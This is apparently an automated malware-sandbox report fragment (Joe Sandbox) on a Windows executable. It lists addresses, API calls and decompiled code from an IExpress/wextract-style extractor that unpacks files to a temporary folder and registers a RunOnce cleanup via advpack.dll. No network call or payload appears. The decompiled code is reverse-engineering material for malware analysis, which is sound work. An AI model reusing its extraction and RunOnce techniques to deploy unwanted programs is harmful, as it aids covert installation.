                                                                                                                                                                                                                                            0x00a020c9
                                                                                                                                                                                                                                            0x00a020d1
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a020d3
                                                                                                                                                                                                                                            0x00a020da
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a020da
                                                                                                                                                                                                                                            0x00a020e2
                                                                                                                                                                                                                                            0x00a02103
                                                                                                                                                                                                                                            0x00a0210e
                                                                                                                                                                                                                                            0x00a02116
                                                                                                                                                                                                                                            0x00a02122
                                                                                                                                                                                                                                            0x00a02128
                                                                                                                                                                                                                                            0x00a0212c
                                                                                                                                                                                                                                            0x00a02179
                                                                                                                                                                                                                                            0x00a02194
                                                                                                                                                                                                                                            0x00a021de
                                                                                                                                                                                                                                            0x00a021e4
                                                                                                                                                                                                                                            0x00a02256
                                                                                                                                                                                                                                            0x00a02256
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a02256
                                                                                                                                                                                                                                            0x00a02196
                                                                                                                                                                                                                                            0x00a02196
                                                                                                                                                                                                                                            0x00a0219c
                                                                                                                                                                                                                                            0x00a0219f
                                                                                                                                                                                                                                            0x00a0219f
                                                                                                                                                                                                                                            0x00a021a1
                                                                                                                                                                                                                                            0x00a021a2
                                                                                                                                                                                                                                            0x00a021a6
                                                                                                                                                                                                                                            0x00a021a8
                                                                                                                                                                                                                                            0x00a021b0
                                                                                                                                                                                                                                            0x00a021b0
                                                                                                                                                                                                                                            0x00a021b2
                                                                                                                                                                                                                                            0x00a021b3
                                                                                                                                                                                                                                            0x00a021bc
                                                                                                                                                                                                                                            0x00a021c7
                                                                                                                                                                                                                                            0x00a021cb
                                                                                                                                                                                                                                            0x00a021f1
                                                                                                                                                                                                                                            0x00a021f6
                                                                                                                                                                                                                                            0x00a021fd
                                                                                                                                                                                                                                            0x00a021ff
                                                                                                                                                                                                                                            0x00a021ff
                                                                                                                                                                                                                                            0x00a02204
                                                                                                                                                                                                                                            0x00a02213
                                                                                                                                                                                                                                            0x00a02218
                                                                                                                                                                                                                                            0x00a0221d
                                                                                                                                                                                                                                            0x00a0221d
                                                                                                                                                                                                                                            0x00a02220
                                                                                                                                                                                                                                            0x00a02220
                                                                                                                                                                                                                                            0x00a02222
                                                                                                                                                                                                                                            0x00a02223
                                                                                                                                                                                                                                            0x00a02229
                                                                                                                                                                                                                                            0x00a0223d
                                                                                                                                                                                                                                            0x00a02249
                                                                                                                                                                                                                                            0x00a02250
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a02250
                                                                                                                                                                                                                                            0x00a021d2
                                                                                                                                                                                                                                            0x00a021d9
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a021d9
                                                                                                                                                                                                                                            0x00a0213a
                                                                                                                                                                                                                                            0x00a02141
                                                                                                                                                                                                                                            0x00a02144
                                                                                                                                                                                                                                            0x00a0214c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a02163
                                                                                                                                                                                                                                            0x00a02172
                                                                                                                                                                                                                                            0x00a02172
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a02163
                                                                                                                                                                                                                                            0x00a020ea
                                                                                                                                                                                                                                            0x00a020f0
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00A02050
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00A0205F
                                                                                                                                                                                                                                            • RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 00A0208C
                                                                                                                                                                                                                                              • Part of subcall function 00A0171E: _vsnprintf.MSVCRT ref: 00A01750
                                                                                                                                                                                                                                            • RegQueryValueExA.KERNELBASE(?,wextract_cleanup1,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A020C9
                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A020EA
                                                                                                                                                                                                                                            • GetSystemDirectoryA.KERNEL32 ref: 00A02103
                                                                                                                                                                                                                                            • LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A02122
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 00A02134
                                                                                                                                                                                                                                            • FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A02144
                                                                                                                                                                                                                                            • GetSystemDirectoryA.KERNEL32 ref: 00A0215B
                                                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A0218C
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A021C1
                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A021E4
                                                                                                                                                                                                                                            • RegSetValueExA.KERNELBASE(?,wextract_cleanup1,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 00A0223D
                                                                                                                                                                                                                                            • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A02249
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A02250
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
                                                                                                                                                                                                                                            • String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup1
                                                                                                                                                                                                                                            • API String ID: 178549006-217856272
                                                                                                                                                                                                                                            • Opcode ID: 3afe3b40258836cf2ada729bb91c9026aa2006d8e3c02246ef0529ef9755b02a
                                                                                                                                                                                                                                            • Instruction ID: 9c1356d584a6e9356c1c40c9a7349de49abdadc9852c0dbb9641106a4a08005d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3afe3b40258836cf2ada729bb91c9026aa2006d8e3c02246ef0529ef9755b02a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8C519471A4031CABDB20DFA4EC4DFEB777CEB54700F0042A9BA45E61D1DA759E4A8B50
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 232 a055a0-a055d9 call a0468f LocalAlloc 235 a055db-a055f1 call a044b9 call a06285 232->235 236 a055fd-a0560c call a0468f 232->236 250 a055f6-a055f8 235->250 242 a05632-a05643 lstrcmpA 236->242 243 a0560e-a05630 call a044b9 LocalFree 236->243 246 a05645 242->246 247 a0564b-a05659 LocalFree 242->247 243->250 246->247 248 a05696-a0569c 247->248 249 a0565b-a0565d 247->249 255 a056a2-a056a8 248->255 256 a0589f-a058b5 call a06517 248->256 252 a05669 249->252 253 a0565f-a05667 249->253 254 a058b7-a058c7 call a06ce0 250->254 257 a0566b-a0567a call a05467 252->257 253->252 253->257 255->256 260 a056ae-a056c1 GetTempPathA 255->260 256->254 269 a05680-a05691 call a044b9 257->269 270 a0589b-a0589d 257->270 264 a056f3-a05711 call a01781 260->264 265 a056c3-a056c9 call a05467 260->265 275 a05717-a05729 GetDriveTypeA 264->275 276 a0586c-a05890 GetWindowsDirectoryA call a0597d 264->276 272 a056ce-a056d0 265->272 269->250 270->254 272->270 273 a056d6-a056df call a02630 272->273 273->264 286 a056e1-a056ed call a05467 273->286 280 a05730-a05740 GetFileAttributesA 275->280 281 a0572b-a0572e 275->281 276->264 287 a05896 276->287 284 a05742-a05745 280->284 285 a0577e-a0578f call a0597d 280->285 281->280 281->284 289 a05747-a0574f 284->289 290 a0576b 284->290 297 a05791-a0579e call a02630 285->297 298 a057b2-a057bf call a02630 285->298 286->264 286->270 287->270 292 a05771-a05779 289->292 294 a05751-a05753 289->294 290->292 296 a05864-a05866 292->296 294->292 299 a05755-a05762 call a06952 294->299 296->275 296->276 297->290 309 a057a0-a057b0 call a0597d 297->309 306 a057c1-a057cd GetWindowsDirectoryA 298->306 307 a057d3-a057f8 call a0658a GetFileAttributesA 298->307 299->290 308 a05764-a05769 299->308 306->307 314 a0580a 307->314 315 a057fa-a05808 CreateDirectoryA 307->315 308->285 308->290 309->290 309->298 316 a0580d-a0580f 314->316 315->316 317 a05811-a05825 316->317 318 a05827-a0585c SetFileAttributesA call a01781 call a05467 316->318 317->296 318->270 323 a0585e 318->323 323->296
                                                                                                                                                                                                                                            C-Code - Quality: 92%
                                                                                                                                                                                                                                            			E00A055A0(void* __eflags) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v265;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t28;
                                                                                                                                                                                                                                            				int _t32;
                                                                                                                                                                                                                                            				int _t33;
                                                                                                                                                                                                                                            				int _t35;
                                                                                                                                                                                                                                            				signed int _t36;
                                                                                                                                                                                                                                            				signed int _t38;
                                                                                                                                                                                                                                            				int _t40;
                                                                                                                                                                                                                                            				int _t44;
                                                                                                                                                                                                                                            				long _t48;
                                                                                                                                                                                                                                            				int _t49;
                                                                                                                                                                                                                                            				int _t50;
                                                                                                                                                                                                                                            				signed int _t53;
                                                                                                                                                                                                                                            				int _t54;
                                                                                                                                                                                                                                            				int _t59;
                                                                                                                                                                                                                                            				char _t60;
                                                                                                                                                                                                                                            				int _t65;
                                                                                                                                                                                                                                            				char _t66;
                                                                                                                                                                                                                                            				int _t67;
                                                                                                                                                                                                                                            				int _t68;
                                                                                                                                                                                                                                            				int _t69;
                                                                                                                                                                                                                                            				int _t70;
                                                                                                                                                                                                                                            				int _t71;
                                                                                                                                                                                                                                            				struct _SECURITY_ATTRIBUTES* _t72;
                                                                                                                                                                                                                                            				int _t73;
                                                                                                                                                                                                                                            				CHAR* _t82;
                                                                                                                                                                                                                                            				CHAR* _t88;
                                                                                                                                                                                                                                            				void* _t103;
                                                                                                                                                                                                                                            				signed int _t110;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t28 =  *0xa08004; // 0xe10713fe
                                                                                                                                                                                                                                            				_v8 = _t28 ^ _t110;
                                                                                                                                                                                                                                            				_t2 = E00A0468F("RUNPROGRAM", 0, 0) + 1; // 0x1
                                                                                                                                                                                                                                            				_t109 = LocalAlloc(0x40, _t2);
                                                                                                                                                                                                                                            				if(_t109 != 0) {
                                                                                                                                                                                                                                            					_t82 = "RUNPROGRAM";
                                                                                                                                                                                                                                            					_t32 = E00A0468F(_t82, _t109, 1);
                                                                                                                                                                                                                                            					__eflags = _t32;
                                                                                                                                                                                                                                            					if(_t32 != 0) {
                                                                                                                                                                                                                                            						_t33 = lstrcmpA(_t109, "<None>");
                                                                                                                                                                                                                                            						__eflags = _t33;
                                                                                                                                                                                                                                            						if(_t33 == 0) {
                                                                                                                                                                                                                                            							 *0xa09a30 = 1;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						LocalFree(_t109);
                                                                                                                                                                                                                                            						_t35 =  *0xa08b3e; // 0x0
                                                                                                                                                                                                                                            						__eflags = _t35;
                                                                                                                                                                                                                                            						if(_t35 == 0) {
                                                                                                                                                                                                                                            							__eflags =  *0xa08a24; // 0x0
                                                                                                                                                                                                                                            							if(__eflags != 0) {
                                                                                                                                                                                                                                            								L46:
                                                                                                                                                                                                                                            								_t101 = 0x7d2;
                                                                                                                                                                                                                                            								_t36 = E00A06517(_t82, 0x7d2, 0, E00A03210, 0, 0);
                                                                                                                                                                                                                                            								asm("sbb eax, eax");
                                                                                                                                                                                                                                            								_t38 =  ~( ~_t36);
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								__eflags =  *0xa09a30; // 0x0
                                                                                                                                                                                                                                            								if(__eflags != 0) {
                                                                                                                                                                                                                                            									goto L46;
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									_t109 = 0xa091e4;
                                                                                                                                                                                                                                            									_t40 = GetTempPathA(0x104, 0xa091e4);
                                                                                                                                                                                                                                            									__eflags = _t40;
                                                                                                                                                                                                                                            									if(_t40 == 0) {
                                                                                                                                                                                                                                            										L19:
                                                                                                                                                                                                                                            										_push(_t82);
                                                                                                                                                                                                                                            										E00A01781( &_v268, 0x104, _t82, "A:\\");
                                                                                                                                                                                                                                            										__eflags = _v268 - 0x5a;
                                                                                                                                                                                                                                            										if(_v268 <= 0x5a) {
                                                                                                                                                                                                                                            											do {
                                                                                                                                                                                                                                            												_t109 = GetDriveTypeA( &_v268);
                                                                                                                                                                                                                                            												__eflags = _t109 - 6;
                                                                                                                                                                                                                                            												if(_t109 == 6) {
                                                                                                                                                                                                                                            													L22:
                                                                                                                                                                                                                                            													_t48 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                                                            													__eflags = _t48 - 0xffffffff;
                                                                                                                                                                                                                                            													if(_t48 != 0xffffffff) {
                                                                                                                                                                                                                                            														goto L30;
                                                                                                                                                                                                                                            													} else {
                                                                                                                                                                                                                                            														goto L23;
                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                                            													__eflags = _t109 - 3;
                                                                                                                                                                                                                                            													if(_t109 != 3) {
                                                                                                                                                                                                                                            														L23:
                                                                                                                                                                                                                                            														__eflags = _t109 - 2;
                                                                                                                                                                                                                                            														if(_t109 != 2) {
                                                                                                                                                                                                                                            															L28:
                                                                                                                                                                                                                                            															_t66 = _v268;
                                                                                                                                                                                                                                            															goto L29;
                                                                                                                                                                                                                                            														} else {
                                                                                                                                                                                                                                            															_t66 = _v268;
                                                                                                                                                                                                                                            															__eflags = _t66 - 0x41;
                                                                                                                                                                                                                                            															if(_t66 == 0x41) {
                                                                                                                                                                                                                                            																L29:
                                                                                                                                                                                                                                            																_t60 = _t66 + 1;
                                                                                                                                                                                                                                            																_v268 = _t60;
                                                                                                                                                                                                                                            																goto L42;
                                                                                                                                                                                                                                            															} else {
                                                                                                                                                                                                                                            																__eflags = _t66 - 0x42;
                                                                                                                                                                                                                                            																if(_t66 == 0x42) {
                                                                                                                                                                                                                                            																	goto L29;
                                                                                                                                                                                                                                            																} else {
                                                                                                                                                                                                                                            																	_t68 = E00A06952( &_v268);
                                                                                                                                                                                                                                            																	__eflags = _t68;
                                                                                                                                                                                                                                            																	if(_t68 == 0) {
                                                                                                                                                                                                                                            																		goto L28;
                                                                                                                                                                                                                                            																	} else {
                                                                                                                                                                                                                                            																		__eflags = _t68 - 0x19000;
                                                                                                                                                                                                                                            																		if(_t68 >= 0x19000) {
                                                                                                                                                                                                                                            																			L30:
                                                                                                                                                                                                                                            																			_push(0);
                                                                                                                                                                                                                                            																			_t103 = 3;
                                                                                                                                                                                                                                            																			_t49 = E00A0597D( &_v268, _t103, 1);
                                                                                                                                                                                                                                            																			__eflags = _t49;
                                                                                                                                                                                                                                            																			if(_t49 != 0) {
                                                                                                                                                                                                                                            																				L33:
                                                                                                                                                                                                                                            																				_t50 = E00A02630(0,  &_v268, 1);
                                                                                                                                                                                                                                            																				__eflags = _t50;
                                                                                                                                                                                                                                            																				if(_t50 != 0) {
                                                                                                                                                                                                                                            																					GetWindowsDirectoryA( &_v268, 0x104);
                                                                                                                                                                                                                                            																				}
                                                                                                                                                                                                                                            																				_t88 =  &_v268;
                                                                                                                                                                                                                                            																				E00A0658A(_t88, 0x104, "msdownld.tmp");
                                                                                                                                                                                                                                            																				_t53 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                                                            																				__eflags = _t53 - 0xffffffff;
                                                                                                                                                                                                                                            																				if(_t53 != 0xffffffff) {
                                                                                                                                                                                                                                            																					_t54 = _t53 & 0x00000010;
                                                                                                                                                                                                                                            																					__eflags = _t54;
                                                                                                                                                                                                                                            																				} else {
                                                                                                                                                                                                                                            																					_t54 = CreateDirectoryA( &_v268, 0);
                                                                                                                                                                                                                                            																				}
                                                                                                                                                                                                                                            																				__eflags = _t54;
                                                                                                                                                                                                                                            																				if(_t54 != 0) {
                                                                                                                                                                                                                                            																					SetFileAttributesA( &_v268, 2);
                                                                                                                                                                                                                                            																					_push(_t88);
                                                                                                                                                                                                                                            																					_t109 = 0xa091e4;
                                                                                                                                                                                                                                            																					E00A01781(0xa091e4, 0x104, _t88,  &_v268);
                                                                                                                                                                                                                                            																					_t101 = 1;
                                                                                                                                                                                                                                            																					_t59 = E00A05467(0xa091e4, 1, 0);
                                                                                                                                                                                                                                            																					__eflags = _t59;
                                                                                                                                                                                                                                            																					if(_t59 != 0) {
                                                                                                                                                                                                                                            																						goto L45;
                                                                                                                                                                                                                                            																					} else {
                                                                                                                                                                                                                                            																						_t60 = _v268;
                                                                                                                                                                                                                                            																						goto L42;
                                                                                                                                                                                                                                            																					}
                                                                                                                                                                                                                                            																				} else {
                                                                                                                                                                                                                                            																					_t60 = _v268 + 1;
                                                                                                                                                                                                                                            																					_v265 = 0;
                                                                                                                                                                                                                                            																					_v268 = _t60;
                                                                                                                                                                                                                                            																					goto L42;
                                                                                                                                                                                                                                            																				}
                                                                                                                                                                                                                                            																			} else {
                                                                                                                                                                                                                                            																				_t65 = E00A02630(0,  &_v268, 1);
                                                                                                                                                                                                                                            																				__eflags = _t65;
                                                                                                                                                                                                                                            																				if(_t65 != 0) {
                                                                                                                                                                                                                                            																					goto L28;
                                                                                                                                                                                                                                            																				} else {
                                                                                                                                                                                                                                            																					_t67 = E00A0597D( &_v268, 1, 1, 0);
                                                                                                                                                                                                                                            																					__eflags = _t67;
                                                                                                                                                                                                                                            																					if(_t67 == 0) {
                                                                                                                                                                                                                                            																						goto L28;
                                                                                                                                                                                                                                            																					} else {
                                                                                                                                                                                                                                            																						goto L33;
                                                                                                                                                                                                                                            																					}
                                                                                                                                                                                                                                            																				}
                                                                                                                                                                                                                                            																			}
                                                                                                                                                                                                                                            																		} else {
                                                                                                                                                                                                                                            																			goto L28;
                                                                                                                                                                                                                                            																		}
                                                                                                                                                                                                                                            																	}
                                                                                                                                                                                                                                            																}
                                                                                                                                                                                                                                            															}
                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                            													} else {
                                                                                                                                                                                                                                            														goto L22;
                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            												goto L47;
                                                                                                                                                                                                                                            												L42:
                                                                                                                                                                                                                                            												__eflags = _t60 - 0x5a;
                                                                                                                                                                                                                                            											} while (_t60 <= 0x5a);
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										goto L43;
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										_t101 = 1;
                                                                                                                                                                                                                                            										_t69 = E00A05467(0xa091e4, 1, 3); // executed
                                                                                                                                                                                                                                            										__eflags = _t69;
                                                                                                                                                                                                                                            										if(_t69 != 0) {
                                                                                                                                                                                                                                            											goto L45;
                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                            											_t82 = 0xa091e4;
                                                                                                                                                                                                                                            											_t70 = E00A02630(0, 0xa091e4, 1);
                                                                                                                                                                                                                                            											__eflags = _t70;
                                                                                                                                                                                                                                            											if(_t70 != 0) {
                                                                                                                                                                                                                                            												goto L19;
                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                            												_t101 = 1;
                                                                                                                                                                                                                                            												_t82 = 0xa091e4;
                                                                                                                                                                                                                                            												_t71 = E00A05467(0xa091e4, 1, 1);
                                                                                                                                                                                                                                            												__eflags = _t71;
                                                                                                                                                                                                                                            												if(_t71 != 0) {
                                                                                                                                                                                                                                            													goto L45;
                                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                                            													do {
                                                                                                                                                                                                                                            														goto L19;
                                                                                                                                                                                                                                            														L43:
                                                                                                                                                                                                                                            														GetWindowsDirectoryA( &_v268, 0x104);
                                                                                                                                                                                                                                            														_push(4);
                                                                                                                                                                                                                                            														_t101 = 3;
                                                                                                                                                                                                                                            														_t82 =  &_v268;
                                                                                                                                                                                                                                            														_t44 = E00A0597D(_t82, _t101, 1);
                                                                                                                                                                                                                                            														__eflags = _t44;
                                                                                                                                                                                                                                            													} while (_t44 != 0);
                                                                                                                                                                                                                                            													goto L2;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							__eflags = _t35 - 0x5c;
                                                                                                                                                                                                                                            							if(_t35 != 0x5c) {
                                                                                                                                                                                                                                            								L10:
                                                                                                                                                                                                                                            								_t72 = 1;
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								__eflags =  *0xa08b3f - _t35; // 0x0
                                                                                                                                                                                                                                            								_t72 = 0;
                                                                                                                                                                                                                                            								if(__eflags != 0) {
                                                                                                                                                                                                                                            									goto L10;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t101 = 0;
                                                                                                                                                                                                                                            							_t73 = E00A05467(0xa08b3e, 0, _t72);
                                                                                                                                                                                                                                            							__eflags = _t73;
                                                                                                                                                                                                                                            							if(_t73 != 0) {
                                                                                                                                                                                                                                            								L45:
                                                                                                                                                                                                                                            								_t38 = 1;
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t101 = 0x4be;
                                                                                                                                                                                                                                            								E00A044B9(0, 0x4be, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            								goto L2;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t101 = 0x4b1;
                                                                                                                                                                                                                                            						E00A044B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            						LocalFree(_t109);
                                                                                                                                                                                                                                            						 *0xa09124 = 0x80070714;
                                                                                                                                                                                                                                            						goto L2;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t101 = 0x4b5;
                                                                                                                                                                                                                                            					E00A044B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            					 *0xa09124 = E00A06285();
                                                                                                                                                                                                                                            					L2:
                                                                                                                                                                                                                                            					_t38 = 0;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				L47:
                                                                                                                                                                                                                                            				return E00A06CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
                                                                                                                                                                                                                                            			}





































                                                                                                                                                                                                                                            0x00a055ab
                                                                                                                                                                                                                                            0x00a055b2
                                                                                                                                                                                                                                            0x00a055c9
                                                                                                                                                                                                                                            0x00a055d5
                                                                                                                                                                                                                                            0x00a055d9
                                                                                                                                                                                                                                            0x00a05600
                                                                                                                                                                                                                                            0x00a05605
                                                                                                                                                                                                                                            0x00a0560a
                                                                                                                                                                                                                                            0x00a0560c
                                                                                                                                                                                                                                            0x00a05638
                                                                                                                                                                                                                                            0x00a05641
                                                                                                                                                                                                                                            0x00a05643
                                                                                                                                                                                                                                            0x00a05645
                                                                                                                                                                                                                                            0x00a05645
                                                                                                                                                                                                                                            0x00a0564c
                                                                                                                                                                                                                                            0x00a05652
                                                                                                                                                                                                                                            0x00a05657
                                                                                                                                                                                                                                            0x00a05659
                                                                                                                                                                                                                                            0x00a05696
                                                                                                                                                                                                                                            0x00a0569c
                                                                                                                                                                                                                                            0x00a0589f
                                                                                                                                                                                                                                            0x00a058a7
                                                                                                                                                                                                                                            0x00a058ac
                                                                                                                                                                                                                                            0x00a058b3
                                                                                                                                                                                                                                            0x00a058b5
                                                                                                                                                                                                                                            0x00a056a2
                                                                                                                                                                                                                                            0x00a056a2
                                                                                                                                                                                                                                            0x00a056a8
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a056ae
                                                                                                                                                                                                                                            0x00a056ae
                                                                                                                                                                                                                                            0x00a056b9
                                                                                                                                                                                                                                            0x00a056bf
                                                                                                                                                                                                                                            0x00a056c1
                                                                                                                                                                                                                                            0x00a056f3
                                                                                                                                                                                                                                            0x00a056f3
                                                                                                                                                                                                                                            0x00a05705
                                                                                                                                                                                                                                            0x00a0570a
                                                                                                                                                                                                                                            0x00a05711
                                                                                                                                                                                                                                            0x00a05717
                                                                                                                                                                                                                                            0x00a05724
                                                                                                                                                                                                                                            0x00a05726
                                                                                                                                                                                                                                            0x00a05729
                                                                                                                                                                                                                                            0x00a05730
                                                                                                                                                                                                                                            0x00a05737
                                                                                                                                                                                                                                            0x00a0573d
                                                                                                                                                                                                                                            0x00a05740
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a0572b
                                                                                                                                                                                                                                            0x00a0572b
                                                                                                                                                                                                                                            0x00a0572e
                                                                                                                                                                                                                                            0x00a05742
                                                                                                                                                                                                                                            0x00a05742
                                                                                                                                                                                                                                            0x00a05745
                                                                                                                                                                                                                                            0x00a0576b
                                                                                                                                                                                                                                            0x00a0576b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a05747
                                                                                                                                                                                                                                            0x00a05747
                                                                                                                                                                                                                                            0x00a0574d
                                                                                                                                                                                                                                            0x00a0574f
                                                                                                                                                                                                                                            0x00a05771
                                                                                                                                                                                                                                            0x00a05771
                                                                                                                                                                                                                                            0x00a05773
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a05751
                                                                                                                                                                                                                                            0x00a05751
                                                                                                                                                                                                                                            0x00a05753
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a05755
                                                                                                                                                                                                                                            0x00a0575b
                                                                                                                                                                                                                                            0x00a05760
                                                                                                                                                                                                                                            0x00a05762
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a05764
                                                                                                                                                                                                                                            0x00a05764
                                                                                                                                                                                                                                            0x00a05769
                                                                                                                                                                                                                                            0x00a0577e
                                                                                                                                                                                                                                            0x00a0577e
                                                                                                                                                                                                                                            0x00a05781
                                                                                                                                                                                                                                            0x00a05788
                                                                                                                                                                                                                                            0x00a0578d
                                                                                                                                                                                                                                            0x00a0578f
                                                                                                                                                                                                                                            0x00a057b2
                                                                                                                                                                                                                                            0x00a057b8
                                                                                                                                                                                                                                            0x00a057bd
                                                                                                                                                                                                                                            0x00a057bf
                                                                                                                                                                                                                                            0x00a057cd
                                                                                                                                                                                                                                            0x00a057cd
                                                                                                                                                                                                                                            0x00a057dd
                                                                                                                                                                                                                                            0x00a057e3
                                                                                                                                                                                                                                            0x00a057ef
                                                                                                                                                                                                                                            0x00a057f5
                                                                                                                                                                                                                                            0x00a057f8
                                                                                                                                                                                                                                            0x00a0580a
                                                                                                                                                                                                                                            0x00a0580a
                                                                                                                                                                                                                                            0x00a057fa
                                                                                                                                                                                                                                            0x00a05802
                                                                                                                                                                                                                                            0x00a05802
                                                                                                                                                                                                                                            0x00a0580d
                                                                                                                                                                                                                                            0x00a0580f
                                                                                                                                                                                                                                            0x00a05830
                                                                                                                                                                                                                                            0x00a05836
                                                                                                                                                                                                                                            0x00a0583d
                                                                                                                                                                                                                                            0x00a0584b
                                                                                                                                                                                                                                            0x00a05851
                                                                                                                                                                                                                                            0x00a05855
                                                                                                                                                                                                                                            0x00a0585a
                                                                                                                                                                                                                                            0x00a0585c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a0585e
                                                                                                                                                                                                                                            0x00a0585e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a0585e
